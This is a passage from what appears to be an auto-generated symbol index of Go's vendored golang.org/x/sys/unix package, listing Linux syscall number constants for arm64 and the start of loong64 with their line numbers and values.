SYS_PIDFD_GETFD (line 401) | SYS_PIDFD_GETFD = 438 constant SYS_FACCESSAT2 (line 402) | SYS_FACCESSAT2 = 439 constant SYS_PROCESS_MADVISE (line 403) | SYS_PROCESS_MADVISE = 440 constant SYS_EPOLL_PWAIT2 (line 404) | SYS_EPOLL_PWAIT2 = 441 constant SYS_MOUNT_SETATTR (line 405) | SYS_MOUNT_SETATTR = 442 constant SYS_QUOTACTL_FD (line 406) | SYS_QUOTACTL_FD = 443 constant SYS_LANDLOCK_CREATE_RULESET (line 407) | SYS_LANDLOCK_CREATE_RULESET = 444 constant SYS_LANDLOCK_ADD_RULE (line 408) | SYS_LANDLOCK_ADD_RULE = 445 constant SYS_LANDLOCK_RESTRICT_SELF (line 409) | SYS_LANDLOCK_RESTRICT_SELF = 446 constant SYS_PROCESS_MRELEASE (line 410) | SYS_PROCESS_MRELEASE = 448 constant SYS_FUTEX_WAITV (line 411) | SYS_FUTEX_WAITV = 449 constant SYS_SET_MEMPOLICY_HOME_NODE (line 412) | SYS_SET_MEMPOLICY_HOME_NODE = 450 constant SYS_CACHESTAT (line 413) | SYS_CACHESTAT = 451 constant SYS_FCHMODAT2 (line 414) | SYS_FCHMODAT2 = 452 constant SYS_MAP_SHADOW_STACK (line 415) | SYS_MAP_SHADOW_STACK = 453 constant SYS_FUTEX_WAKE (line 416) | SYS_FUTEX_WAKE = 454 constant SYS_FUTEX_WAIT (line 417) | SYS_FUTEX_WAIT = 455 constant SYS_FUTEX_REQUEUE (line 418) | SYS_FUTEX_REQUEUE = 456 FILE: vendor/golang.org/x/sys/unix/zsysnum_linux_arm64.go constant SYS_IO_SETUP (line 9) | SYS_IO_SETUP = 0 constant SYS_IO_DESTROY (line 10) | SYS_IO_DESTROY = 1 constant SYS_IO_SUBMIT (line 11) | SYS_IO_SUBMIT = 2 constant SYS_IO_CANCEL (line 12) | SYS_IO_CANCEL = 3 constant SYS_IO_GETEVENTS (line 13) | SYS_IO_GETEVENTS = 4 constant SYS_SETXATTR (line 14) | SYS_SETXATTR = 5 constant SYS_LSETXATTR (line 15) | SYS_LSETXATTR = 6 constant SYS_FSETXATTR (line 16) | SYS_FSETXATTR = 7 constant SYS_GETXATTR (line 17) | SYS_GETXATTR = 8 constant SYS_LGETXATTR (line 18) | SYS_LGETXATTR = 9 constant SYS_FGETXATTR (line 19) | SYS_FGETXATTR = 10 constant SYS_LISTXATTR (line 20) | SYS_LISTXATTR = 11 constant SYS_LLISTXATTR (line 21) | SYS_LLISTXATTR = 12 constant SYS_FLISTXATTR (line 22) | SYS_FLISTXATTR = 13 constant SYS_REMOVEXATTR (line 23) | SYS_REMOVEXATTR = 14 constant SYS_LREMOVEXATTR (line 24) | SYS_LREMOVEXATTR = 15 constant SYS_FREMOVEXATTR (line 25) | SYS_FREMOVEXATTR = 16 constant SYS_GETCWD (line 26) | SYS_GETCWD = 17 constant SYS_LOOKUP_DCOOKIE (line 27) | SYS_LOOKUP_DCOOKIE = 18 constant SYS_EVENTFD2 (line 28) | SYS_EVENTFD2 = 19 constant SYS_EPOLL_CREATE1 (line 29) | SYS_EPOLL_CREATE1 = 20 constant SYS_EPOLL_CTL (line 30) | SYS_EPOLL_CTL = 21 constant SYS_EPOLL_PWAIT (line 31) | SYS_EPOLL_PWAIT = 22 constant SYS_DUP (line 32) | SYS_DUP = 23 constant SYS_DUP3 (line 33) | SYS_DUP3 = 24 constant SYS_FCNTL (line 34) | SYS_FCNTL = 25 constant SYS_INOTIFY_INIT1 (line 35) | SYS_INOTIFY_INIT1 = 26 constant SYS_INOTIFY_ADD_WATCH (line 36) | SYS_INOTIFY_ADD_WATCH = 27 constant SYS_INOTIFY_RM_WATCH (line 37) | SYS_INOTIFY_RM_WATCH = 28 constant SYS_IOCTL (line 38) | SYS_IOCTL = 29 constant SYS_IOPRIO_SET (line 39) | SYS_IOPRIO_SET = 30 constant SYS_IOPRIO_GET (line 40) | SYS_IOPRIO_GET = 31 constant SYS_FLOCK (line 41) | SYS_FLOCK = 32 constant SYS_MKNODAT (line 42) | SYS_MKNODAT = 33 constant SYS_MKDIRAT (line 43) | SYS_MKDIRAT = 34 constant SYS_UNLINKAT (line 44) | SYS_UNLINKAT = 35 constant SYS_SYMLINKAT (line 45) | SYS_SYMLINKAT = 36 constant SYS_LINKAT (line 46) | SYS_LINKAT = 37 constant SYS_RENAMEAT (line 47) | SYS_RENAMEAT = 38 constant SYS_UMOUNT2 (line 48) | SYS_UMOUNT2 = 39 constant SYS_MOUNT (line 49) | SYS_MOUNT = 40 constant SYS_PIVOT_ROOT (line 50) | SYS_PIVOT_ROOT = 41 constant SYS_NFSSERVCTL (line 51) | SYS_NFSSERVCTL = 42 constant SYS_STATFS (line 52) | SYS_STATFS = 43 constant SYS_FSTATFS (line 53) | SYS_FSTATFS = 44 constant SYS_TRUNCATE (line 54) | SYS_TRUNCATE = 45 constant SYS_FTRUNCATE (line 55) | SYS_FTRUNCATE = 46 constant SYS_FALLOCATE (line 56) | SYS_FALLOCATE = 47 constant SYS_FACCESSAT (line 57) | SYS_FACCESSAT = 48 constant SYS_CHDIR (line 58) | SYS_CHDIR = 49 constant SYS_FCHDIR (line 59) | SYS_FCHDIR = 50 constant SYS_CHROOT (line 60) | SYS_CHROOT = 51 constant SYS_FCHMOD (line 61) | SYS_FCHMOD = 52 constant SYS_FCHMODAT (line 62) | SYS_FCHMODAT = 53 constant SYS_FCHOWNAT (line 63) | SYS_FCHOWNAT = 54 constant SYS_FCHOWN (line 64) | SYS_FCHOWN = 55 constant SYS_OPENAT (line 65) | SYS_OPENAT = 56 constant SYS_CLOSE (line 66) | SYS_CLOSE = 57 constant SYS_VHANGUP (line 67) | SYS_VHANGUP = 58 constant SYS_PIPE2 (line 68) | SYS_PIPE2 = 59 constant SYS_QUOTACTL (line 69) | SYS_QUOTACTL = 60 constant SYS_GETDENTS64 (line 70) | SYS_GETDENTS64 = 61 constant SYS_LSEEK (line 71) | SYS_LSEEK = 62 constant SYS_READ (line 72) | SYS_READ = 63 constant SYS_WRITE (line 73) | SYS_WRITE = 64 constant SYS_READV (line 74) | SYS_READV = 65 constant SYS_WRITEV (line 75) | SYS_WRITEV = 66 constant SYS_PREAD64 (line 76) | SYS_PREAD64 = 67 constant SYS_PWRITE64 (line 77) | SYS_PWRITE64 = 68 constant SYS_PREADV (line 78) | SYS_PREADV = 69 constant SYS_PWRITEV (line 79) | SYS_PWRITEV = 70 constant SYS_SENDFILE (line 80) | SYS_SENDFILE = 71 constant SYS_PSELECT6 (line 81) | SYS_PSELECT6 = 72 constant SYS_PPOLL (line 82) | SYS_PPOLL = 73 constant SYS_SIGNALFD4 (line 83) | SYS_SIGNALFD4 = 74 constant SYS_VMSPLICE (line 84) | SYS_VMSPLICE = 75 constant SYS_SPLICE (line 85) | SYS_SPLICE = 76 constant SYS_TEE (line 86) | SYS_TEE = 77 constant SYS_READLINKAT (line 87) | SYS_READLINKAT = 78 constant SYS_FSTATAT (line 88) | SYS_FSTATAT = 79 constant SYS_FSTAT (line 89) | SYS_FSTAT = 80 constant SYS_SYNC (line 90) | SYS_SYNC = 81 constant SYS_FSYNC (line 91) | SYS_FSYNC = 82 constant SYS_FDATASYNC (line 92) | SYS_FDATASYNC = 83 constant SYS_SYNC_FILE_RANGE (line 93) | SYS_SYNC_FILE_RANGE = 84 constant SYS_TIMERFD_CREATE (line 94) | SYS_TIMERFD_CREATE = 85 constant SYS_TIMERFD_SETTIME (line 95) | SYS_TIMERFD_SETTIME = 86 constant SYS_TIMERFD_GETTIME (line 96) | SYS_TIMERFD_GETTIME = 87 constant SYS_UTIMENSAT (line 97) | SYS_UTIMENSAT = 88 constant SYS_ACCT (line 98) | SYS_ACCT = 89 constant SYS_CAPGET (line 99) | SYS_CAPGET = 90 constant SYS_CAPSET (line 100) | SYS_CAPSET = 91 constant SYS_PERSONALITY (line 101) | SYS_PERSONALITY = 92 constant SYS_EXIT (line 102) | SYS_EXIT = 93 constant SYS_EXIT_GROUP (line 103) | SYS_EXIT_GROUP = 94 constant SYS_WAITID (line 104) | SYS_WAITID = 95 constant SYS_SET_TID_ADDRESS (line 105) | SYS_SET_TID_ADDRESS = 96 constant SYS_UNSHARE (line 106) | SYS_UNSHARE = 97 constant SYS_FUTEX (line 107) | SYS_FUTEX = 98 constant SYS_SET_ROBUST_LIST (line 108) | SYS_SET_ROBUST_LIST = 99 constant SYS_GET_ROBUST_LIST (line 109) | SYS_GET_ROBUST_LIST = 100 constant SYS_NANOSLEEP (line 110) | SYS_NANOSLEEP = 101 constant SYS_GETITIMER (line 111) | SYS_GETITIMER = 102 constant SYS_SETITIMER (line 112) | SYS_SETITIMER = 103 constant SYS_KEXEC_LOAD (line 113) | SYS_KEXEC_LOAD = 104 constant SYS_INIT_MODULE (line 114) | SYS_INIT_MODULE = 105 constant SYS_DELETE_MODULE (line 115) | SYS_DELETE_MODULE = 106 constant SYS_TIMER_CREATE (line 116) | SYS_TIMER_CREATE = 107 constant SYS_TIMER_GETTIME (line 117) | SYS_TIMER_GETTIME = 108 constant SYS_TIMER_GETOVERRUN (line 118) | SYS_TIMER_GETOVERRUN = 109 constant SYS_TIMER_SETTIME (line 119) | SYS_TIMER_SETTIME = 110 constant SYS_TIMER_DELETE (line 120) | SYS_TIMER_DELETE = 111 constant SYS_CLOCK_SETTIME (line 121) | SYS_CLOCK_SETTIME = 112 constant SYS_CLOCK_GETTIME (line 122) | SYS_CLOCK_GETTIME = 113 constant SYS_CLOCK_GETRES (line 123) | SYS_CLOCK_GETRES = 114 constant SYS_CLOCK_NANOSLEEP (line 124) | SYS_CLOCK_NANOSLEEP = 115 constant SYS_SYSLOG (line 125) | SYS_SYSLOG = 116 constant SYS_PTRACE (line 126) | SYS_PTRACE = 117 constant SYS_SCHED_SETPARAM (line 127) | SYS_SCHED_SETPARAM = 118 constant SYS_SCHED_SETSCHEDULER (line 128) | SYS_SCHED_SETSCHEDULER = 119 constant SYS_SCHED_GETSCHEDULER (line 129) | SYS_SCHED_GETSCHEDULER = 120 constant SYS_SCHED_GETPARAM (line 130) | SYS_SCHED_GETPARAM = 121 constant SYS_SCHED_SETAFFINITY (line 131) | SYS_SCHED_SETAFFINITY = 122 constant SYS_SCHED_GETAFFINITY (line 132) | SYS_SCHED_GETAFFINITY = 123 constant SYS_SCHED_YIELD (line 133) | SYS_SCHED_YIELD = 124 constant SYS_SCHED_GET_PRIORITY_MAX (line 134) | SYS_SCHED_GET_PRIORITY_MAX = 125 constant SYS_SCHED_GET_PRIORITY_MIN (line 135) | SYS_SCHED_GET_PRIORITY_MIN = 126 constant SYS_SCHED_RR_GET_INTERVAL (line 136) | SYS_SCHED_RR_GET_INTERVAL = 127 constant SYS_RESTART_SYSCALL (line 137) | SYS_RESTART_SYSCALL = 128 constant SYS_KILL (line 138) | SYS_KILL = 129 constant SYS_TKILL (line 139) | SYS_TKILL = 130 constant SYS_TGKILL (line 140) | SYS_TGKILL = 131 constant SYS_SIGALTSTACK (line 141) | SYS_SIGALTSTACK = 132 constant SYS_RT_SIGSUSPEND (line 142) | SYS_RT_SIGSUSPEND = 133 constant SYS_RT_SIGACTION (line 143) | SYS_RT_SIGACTION = 134 constant SYS_RT_SIGPROCMASK (line 144) | SYS_RT_SIGPROCMASK = 135 constant SYS_RT_SIGPENDING (line 145) | SYS_RT_SIGPENDING = 136 constant SYS_RT_SIGTIMEDWAIT (line 146) | SYS_RT_SIGTIMEDWAIT = 137 constant SYS_RT_SIGQUEUEINFO (line 147) | SYS_RT_SIGQUEUEINFO = 138 constant SYS_RT_SIGRETURN (line 148) | SYS_RT_SIGRETURN = 139 constant SYS_SETPRIORITY (line 149) | SYS_SETPRIORITY = 140 constant SYS_GETPRIORITY (line 150) | SYS_GETPRIORITY = 141 constant SYS_REBOOT (line 151) | SYS_REBOOT = 142 constant SYS_SETREGID (line 152) | SYS_SETREGID = 143 constant SYS_SETGID (line 153) | SYS_SETGID = 144 constant SYS_SETREUID (line 154) | SYS_SETREUID = 145 constant SYS_SETUID (line 155) | SYS_SETUID = 146 constant SYS_SETRESUID (line 156) | SYS_SETRESUID = 147 constant SYS_GETRESUID (line 157) | SYS_GETRESUID = 148 constant SYS_SETRESGID (line 158) | SYS_SETRESGID = 149 constant SYS_GETRESGID (line 159) | SYS_GETRESGID = 150 constant SYS_SETFSUID (line 160) | SYS_SETFSUID = 151 constant SYS_SETFSGID (line 161) | SYS_SETFSGID = 152 constant SYS_TIMES (line 162) | SYS_TIMES = 153 constant SYS_SETPGID (line 163) | SYS_SETPGID = 154 constant SYS_GETPGID (line 164) | SYS_GETPGID = 155 constant SYS_GETSID (line 165) | SYS_GETSID = 156 constant SYS_SETSID (line 166) | SYS_SETSID = 157 constant SYS_GETGROUPS (line 167) | SYS_GETGROUPS = 158 constant SYS_SETGROUPS (line 168) | SYS_SETGROUPS = 159 constant SYS_UNAME (line 169) | SYS_UNAME = 160 constant SYS_SETHOSTNAME (line 170) | SYS_SETHOSTNAME = 161 constant SYS_SETDOMAINNAME (line 171) | SYS_SETDOMAINNAME = 162 constant SYS_GETRLIMIT (line 172) | SYS_GETRLIMIT = 163 constant SYS_SETRLIMIT (line 173) | SYS_SETRLIMIT = 164 constant SYS_GETRUSAGE (line 174) | SYS_GETRUSAGE = 165 constant SYS_UMASK (line 175) | SYS_UMASK = 166 constant SYS_PRCTL (line 176) | SYS_PRCTL = 167 constant SYS_GETCPU (line 177) | SYS_GETCPU = 168 constant SYS_GETTIMEOFDAY (line 178) | SYS_GETTIMEOFDAY = 169 constant SYS_SETTIMEOFDAY (line 179) | SYS_SETTIMEOFDAY = 170 constant SYS_ADJTIMEX (line 180) | SYS_ADJTIMEX = 171 constant SYS_GETPID (line 181) | SYS_GETPID = 172 constant SYS_GETPPID (line 182) | SYS_GETPPID = 173 constant SYS_GETUID (line 183) | SYS_GETUID = 174 constant SYS_GETEUID (line 184) | SYS_GETEUID = 175 constant SYS_GETGID (line 185) | SYS_GETGID = 176 constant SYS_GETEGID (line 186) | SYS_GETEGID = 177 constant SYS_GETTID (line 187) | SYS_GETTID = 178 constant SYS_SYSINFO (line 188) | SYS_SYSINFO = 179 constant SYS_MQ_OPEN (line 189) | SYS_MQ_OPEN = 180 constant SYS_MQ_UNLINK (line 190) | SYS_MQ_UNLINK = 181 constant SYS_MQ_TIMEDSEND (line 191) | SYS_MQ_TIMEDSEND = 182 constant SYS_MQ_TIMEDRECEIVE (line 192) | SYS_MQ_TIMEDRECEIVE = 183 constant SYS_MQ_NOTIFY (line 193) | SYS_MQ_NOTIFY = 184 constant SYS_MQ_GETSETATTR (line 194) | SYS_MQ_GETSETATTR = 185 constant SYS_MSGGET (line 195) | SYS_MSGGET = 186 constant SYS_MSGCTL (line 196) | SYS_MSGCTL = 187 constant SYS_MSGRCV (line 197) | SYS_MSGRCV = 188 constant SYS_MSGSND (line 198) | SYS_MSGSND = 189 constant SYS_SEMGET (line 199) | SYS_SEMGET = 190 constant SYS_SEMCTL (line 200) | SYS_SEMCTL = 191 constant SYS_SEMTIMEDOP (line 201) | SYS_SEMTIMEDOP = 192 constant SYS_SEMOP (line 202) | SYS_SEMOP = 193 constant SYS_SHMGET (line 203) | SYS_SHMGET = 194 constant SYS_SHMCTL (line 204) | SYS_SHMCTL = 195 constant SYS_SHMAT (line 205) | SYS_SHMAT = 196 constant SYS_SHMDT (line 206) | SYS_SHMDT = 197 constant SYS_SOCKET (line 207) | SYS_SOCKET = 198 constant SYS_SOCKETPAIR (line 208) | SYS_SOCKETPAIR = 199 constant SYS_BIND (line 209) | SYS_BIND = 200 constant SYS_LISTEN (line 210) | SYS_LISTEN = 201 constant SYS_ACCEPT (line 211) | SYS_ACCEPT = 202 constant SYS_CONNECT (line 212) | SYS_CONNECT = 203 constant SYS_GETSOCKNAME (line 213) | SYS_GETSOCKNAME = 204 constant SYS_GETPEERNAME (line 214) | SYS_GETPEERNAME = 205 constant SYS_SENDTO (line 215) | SYS_SENDTO = 206 constant SYS_RECVFROM (line 216) | SYS_RECVFROM = 207 constant SYS_SETSOCKOPT (line 217) | SYS_SETSOCKOPT = 208 constant SYS_GETSOCKOPT (line 218) | SYS_GETSOCKOPT = 209 constant SYS_SHUTDOWN (line 219) | SYS_SHUTDOWN = 210 constant SYS_SENDMSG (line 220) | SYS_SENDMSG = 211 constant SYS_RECVMSG (line 221) | SYS_RECVMSG = 212 constant SYS_READAHEAD (line 222) | SYS_READAHEAD = 213 constant SYS_BRK (line 223) | SYS_BRK = 214 constant SYS_MUNMAP (line 224) | SYS_MUNMAP = 215 constant SYS_MREMAP (line 225) | SYS_MREMAP = 216 constant SYS_ADD_KEY (line 226) | SYS_ADD_KEY = 217 constant SYS_REQUEST_KEY (line 227) | SYS_REQUEST_KEY = 218 constant SYS_KEYCTL (line 228) | SYS_KEYCTL = 219 constant SYS_CLONE (line 229) | SYS_CLONE = 220 constant SYS_EXECVE (line 230) | SYS_EXECVE = 221 constant SYS_MMAP (line 231) | SYS_MMAP = 222 constant SYS_FADVISE64 (line 232) | SYS_FADVISE64 = 223 constant SYS_SWAPON (line 233) | SYS_SWAPON = 224 constant SYS_SWAPOFF (line 234) | SYS_SWAPOFF = 225 constant SYS_MPROTECT (line 235) | SYS_MPROTECT = 226 constant SYS_MSYNC (line 236) | SYS_MSYNC = 227 constant SYS_MLOCK (line 237) | SYS_MLOCK = 228 constant SYS_MUNLOCK (line 238) | SYS_MUNLOCK = 229 constant SYS_MLOCKALL (line 239) | SYS_MLOCKALL = 230 constant SYS_MUNLOCKALL (line 240) | SYS_MUNLOCKALL = 231 constant SYS_MINCORE (line 241) | SYS_MINCORE = 232 constant SYS_MADVISE (line 242) | SYS_MADVISE = 233 constant SYS_REMAP_FILE_PAGES (line 243) | SYS_REMAP_FILE_PAGES = 234 constant SYS_MBIND (line 244) | SYS_MBIND = 235 constant SYS_GET_MEMPOLICY (line 245) | SYS_GET_MEMPOLICY = 236 constant SYS_SET_MEMPOLICY (line 246) | SYS_SET_MEMPOLICY = 237 constant SYS_MIGRATE_PAGES (line 247) | SYS_MIGRATE_PAGES = 238 constant SYS_MOVE_PAGES (line 248) | SYS_MOVE_PAGES = 239 constant SYS_RT_TGSIGQUEUEINFO (line 249) | SYS_RT_TGSIGQUEUEINFO = 240 constant SYS_PERF_EVENT_OPEN (line 250) | SYS_PERF_EVENT_OPEN = 241 constant SYS_ACCEPT4 (line 251) | SYS_ACCEPT4 = 242 constant SYS_RECVMMSG (line 252) | SYS_RECVMMSG = 243 constant SYS_ARCH_SPECIFIC_SYSCALL (line 253) | SYS_ARCH_SPECIFIC_SYSCALL = 244 constant SYS_WAIT4 (line 254) | SYS_WAIT4 = 260 constant SYS_PRLIMIT64 (line 255) | SYS_PRLIMIT64 = 261 constant SYS_FANOTIFY_INIT (line 256) | SYS_FANOTIFY_INIT = 262 constant SYS_FANOTIFY_MARK (line 257) | SYS_FANOTIFY_MARK = 263 constant SYS_NAME_TO_HANDLE_AT (line 258) | SYS_NAME_TO_HANDLE_AT = 264 constant SYS_OPEN_BY_HANDLE_AT (line 259) | SYS_OPEN_BY_HANDLE_AT = 265 constant SYS_CLOCK_ADJTIME (line 260) | SYS_CLOCK_ADJTIME = 266 constant SYS_SYNCFS (line 261) | SYS_SYNCFS = 267 constant SYS_SETNS (line 262) | SYS_SETNS = 268 constant SYS_SENDMMSG (line 263) | SYS_SENDMMSG = 269 constant SYS_PROCESS_VM_READV (line 264) | SYS_PROCESS_VM_READV = 270 constant SYS_PROCESS_VM_WRITEV (line 265) | SYS_PROCESS_VM_WRITEV = 271 constant SYS_KCMP (line 266) | SYS_KCMP = 272 constant SYS_FINIT_MODULE (line 267) | SYS_FINIT_MODULE = 273 constant SYS_SCHED_SETATTR (line 268) | SYS_SCHED_SETATTR = 274 constant SYS_SCHED_GETATTR (line 269) | SYS_SCHED_GETATTR = 275 constant SYS_RENAMEAT2 (line 270) | SYS_RENAMEAT2 = 276 constant SYS_SECCOMP (line 271) | SYS_SECCOMP = 277 constant SYS_GETRANDOM (line 272) | SYS_GETRANDOM = 278 constant SYS_MEMFD_CREATE (line 273) | SYS_MEMFD_CREATE = 279 constant SYS_BPF (line 274) | SYS_BPF = 280 constant SYS_EXECVEAT (line 275) | SYS_EXECVEAT = 281 constant SYS_USERFAULTFD (line 276) | SYS_USERFAULTFD = 282 constant SYS_MEMBARRIER (line 277) | SYS_MEMBARRIER = 283 constant SYS_MLOCK2 (line 278) | SYS_MLOCK2 = 284 constant SYS_COPY_FILE_RANGE (line 279) | SYS_COPY_FILE_RANGE = 285 constant SYS_PREADV2 (line 280) | SYS_PREADV2 = 286 constant SYS_PWRITEV2 (line 281) | SYS_PWRITEV2 = 287 constant SYS_PKEY_MPROTECT (line 282) | SYS_PKEY_MPROTECT = 288 constant SYS_PKEY_ALLOC (line 283) | SYS_PKEY_ALLOC = 289 constant SYS_PKEY_FREE (line 284) | SYS_PKEY_FREE = 290 constant SYS_STATX (line 285) | SYS_STATX = 291 constant SYS_IO_PGETEVENTS (line 286) | SYS_IO_PGETEVENTS = 292 constant SYS_RSEQ (line 287) | SYS_RSEQ = 293 constant SYS_KEXEC_FILE_LOAD (line 288) | SYS_KEXEC_FILE_LOAD = 294 constant SYS_PIDFD_SEND_SIGNAL (line 289) | SYS_PIDFD_SEND_SIGNAL = 424 constant SYS_IO_URING_SETUP (line 290) | SYS_IO_URING_SETUP = 425 constant SYS_IO_URING_ENTER (line 291) | SYS_IO_URING_ENTER = 426 constant SYS_IO_URING_REGISTER (line 292) | SYS_IO_URING_REGISTER = 427 constant SYS_OPEN_TREE (line 293) | SYS_OPEN_TREE = 428 constant SYS_MOVE_MOUNT (line 294) | SYS_MOVE_MOUNT = 429 constant SYS_FSOPEN (line 295) | SYS_FSOPEN = 430 constant SYS_FSCONFIG (line 296) | SYS_FSCONFIG = 431 constant SYS_FSMOUNT (line 297) | SYS_FSMOUNT = 432 constant SYS_FSPICK (line 298) | SYS_FSPICK = 433 constant SYS_PIDFD_OPEN (line 299) | SYS_PIDFD_OPEN = 434 constant SYS_CLONE3 (line 300) | SYS_CLONE3 = 435 constant SYS_CLOSE_RANGE (line 301) | SYS_CLOSE_RANGE = 436 constant SYS_OPENAT2 (line 302) | SYS_OPENAT2 = 437 constant SYS_PIDFD_GETFD (line 303) | SYS_PIDFD_GETFD = 438 constant SYS_FACCESSAT2 (line 304) | SYS_FACCESSAT2 = 439 constant SYS_PROCESS_MADVISE (line 305) | SYS_PROCESS_MADVISE = 440 constant SYS_EPOLL_PWAIT2 (line 306) | SYS_EPOLL_PWAIT2 = 441 constant SYS_MOUNT_SETATTR (line 307) | SYS_MOUNT_SETATTR = 442 constant SYS_QUOTACTL_FD (line 308) | SYS_QUOTACTL_FD = 443 constant SYS_LANDLOCK_CREATE_RULESET (line 309) | SYS_LANDLOCK_CREATE_RULESET = 444 constant SYS_LANDLOCK_ADD_RULE (line 310) | SYS_LANDLOCK_ADD_RULE = 445 constant SYS_LANDLOCK_RESTRICT_SELF (line 311) | SYS_LANDLOCK_RESTRICT_SELF = 446 constant SYS_MEMFD_SECRET (line 312) | SYS_MEMFD_SECRET = 447 constant SYS_PROCESS_MRELEASE (line 313) | SYS_PROCESS_MRELEASE = 448 constant SYS_FUTEX_WAITV (line 314) | SYS_FUTEX_WAITV = 449 constant SYS_SET_MEMPOLICY_HOME_NODE (line 315) | SYS_SET_MEMPOLICY_HOME_NODE = 450 constant SYS_CACHESTAT (line 316) | SYS_CACHESTAT = 451 constant SYS_FCHMODAT2 (line 317) | SYS_FCHMODAT2 = 452 constant SYS_MAP_SHADOW_STACK (line 318) | SYS_MAP_SHADOW_STACK = 453 constant SYS_FUTEX_WAKE (line 319) | SYS_FUTEX_WAKE = 454 constant SYS_FUTEX_WAIT (line 320) | SYS_FUTEX_WAIT = 455 constant SYS_FUTEX_REQUEUE (line 321) | SYS_FUTEX_REQUEUE = 456 FILE: vendor/golang.org/x/sys/unix/zsysnum_linux_loong64.go constant SYS_IO_SETUP (line 9) | SYS_IO_SETUP = 0 constant SYS_IO_DESTROY (line 10) | SYS_IO_DESTROY = 1 constant SYS_IO_SUBMIT (line 11) | SYS_IO_SUBMIT = 2 constant SYS_IO_CANCEL (line 12) | SYS_IO_CANCEL = 3 constant SYS_IO_GETEVENTS (line 13) | SYS_IO_GETEVENTS = 4 constant SYS_SETXATTR (line 14) | SYS_SETXATTR = 5 constant SYS_LSETXATTR (line 15) | SYS_LSETXATTR = 6 constant SYS_FSETXATTR (line 16) | SYS_FSETXATTR = 7 constant SYS_GETXATTR (line 17) | SYS_GETXATTR = 8 constant SYS_LGETXATTR (line 18) | SYS_LGETXATTR = 9 constant SYS_FGETXATTR (line 19) | SYS_FGETXATTR = 10 constant SYS_LISTXATTR (line 20) | SYS_LISTXATTR = 11 constant SYS_LLISTXATTR (line 21) | SYS_LLISTXATTR = 12 constant SYS_FLISTXATTR (line 22) | SYS_FLISTXATTR = 13 constant SYS_REMOVEXATTR (line 23) | SYS_REMOVEXATTR = 14 constant SYS_LREMOVEXATTR (line 24) | SYS_LREMOVEXATTR = 15 constant SYS_FREMOVEXATTR (line 25) | SYS_FREMOVEXATTR = 16 constant SYS_GETCWD (line 26) | SYS_GETCWD = 17 constant SYS_LOOKUP_DCOOKIE (line 27) | SYS_LOOKUP_DCOOKIE = 18 constant SYS_EVENTFD2 (line 28) | SYS_EVENTFD2 = 19 constant SYS_EPOLL_CREATE1 (line 29) | SYS_EPOLL_CREATE1 = 20 constant SYS_EPOLL_CTL (line 30) | SYS_EPOLL_CTL = 21 constant SYS_EPOLL_PWAIT (line 31) | SYS_EPOLL_PWAIT = 22 constant SYS_DUP (line 32) | SYS_DUP = 23 constant SYS_DUP3 (line 33) | SYS_DUP3 = 24 constant SYS_FCNTL (line 34) | SYS_FCNTL = 25 constant SYS_INOTIFY_INIT1 (line 35) | SYS_INOTIFY_INIT1 = 26 constant SYS_INOTIFY_ADD_WATCH (line 36) | SYS_INOTIFY_ADD_WATCH = 27 constant SYS_INOTIFY_RM_WATCH (line 37) | SYS_INOTIFY_RM_WATCH = 28 constant SYS_IOCTL (line 38) | SYS_IOCTL = 29 constant SYS_IOPRIO_SET (line 39) | SYS_IOPRIO_SET = 30 constant SYS_IOPRIO_GET (line 40) | SYS_IOPRIO_GET = 31 constant SYS_FLOCK (line 41) | SYS_FLOCK = 32 constant SYS_MKNODAT (line 42) | SYS_MKNODAT = 33 constant SYS_MKDIRAT (line 43) | SYS_MKDIRAT = 34 constant SYS_UNLINKAT (line 44) | SYS_UNLINKAT = 35 constant SYS_SYMLINKAT (line 45) | SYS_SYMLINKAT = 36 constant SYS_LINKAT (line 46) | SYS_LINKAT = 37 constant SYS_UMOUNT2 (line 47) | SYS_UMOUNT2 = 39 constant SYS_MOUNT (line 48) | SYS_MOUNT = 40 constant SYS_PIVOT_ROOT (line 49) | SYS_PIVOT_ROOT = 41 constant SYS_NFSSERVCTL (line 50) | SYS_NFSSERVCTL = 42 constant SYS_STATFS (line 51) | SYS_STATFS = 43 constant SYS_FSTATFS (line 52) | SYS_FSTATFS = 44 constant SYS_TRUNCATE (line 53) | SYS_TRUNCATE = 45 constant SYS_FTRUNCATE (line 54) | SYS_FTRUNCATE = 46 constant SYS_FALLOCATE (line 55) | SYS_FALLOCATE = 47 constant SYS_FACCESSAT (line 56) | SYS_FACCESSAT = 48 constant SYS_CHDIR (line 57) | SYS_CHDIR = 49 constant SYS_FCHDIR (line 58) | SYS_FCHDIR = 50 constant SYS_CHROOT (line 59) | SYS_CHROOT = 51 constant SYS_FCHMOD (line 60) | SYS_FCHMOD = 52 constant SYS_FCHMODAT (line 61) | SYS_FCHMODAT = 53 constant SYS_FCHOWNAT (line 62) | SYS_FCHOWNAT = 54 constant SYS_FCHOWN (line 63) | SYS_FCHOWN = 55 constant SYS_OPENAT (line 64) | SYS_OPENAT = 56 constant SYS_CLOSE (line 65) | SYS_CLOSE = 57 constant SYS_VHANGUP (line 66) | SYS_VHANGUP = 58 constant SYS_PIPE2 (line 67) | SYS_PIPE2 = 59 constant SYS_QUOTACTL (line 68) | SYS_QUOTACTL = 60 constant SYS_GETDENTS64 (line 69) | SYS_GETDENTS64 = 61 constant SYS_LSEEK (line 70) | SYS_LSEEK = 62 constant SYS_READ (line 71) | SYS_READ = 63 constant SYS_WRITE (line 72) | SYS_WRITE = 64 constant SYS_READV (line 73) | SYS_READV = 65 constant SYS_WRITEV (line 74) | SYS_WRITEV = 66 constant SYS_PREAD64 (line 75) | SYS_PREAD64 = 67 constant SYS_PWRITE64 (line 76) | SYS_PWRITE64 = 68 constant SYS_PREADV (line 77) | SYS_PREADV = 69 constant SYS_PWRITEV (line 78) | SYS_PWRITEV = 70 constant SYS_SENDFILE (line 79) | SYS_SENDFILE = 71 constant SYS_PSELECT6 (line 80) | SYS_PSELECT6 = 72 constant SYS_PPOLL (line 81) | SYS_PPOLL = 73 constant SYS_SIGNALFD4 (line 82) | SYS_SIGNALFD4 = 74 constant SYS_VMSPLICE (line 83) | SYS_VMSPLICE = 75 constant SYS_SPLICE (line 84) | SYS_SPLICE = 76 constant SYS_TEE (line 85) | SYS_TEE = 77 constant SYS_READLINKAT (line 86) | SYS_READLINKAT = 78 constant SYS_SYNC (line 87) | SYS_SYNC = 81 constant SYS_FSYNC (line 88) | SYS_FSYNC = 82 constant SYS_FDATASYNC (line 89) | SYS_FDATASYNC = 83 constant SYS_SYNC_FILE_RANGE (line 90) | SYS_SYNC_FILE_RANGE = 84 constant SYS_TIMERFD_CREATE (line 91) | SYS_TIMERFD_CREATE = 85 constant SYS_TIMERFD_SETTIME (line 92) | 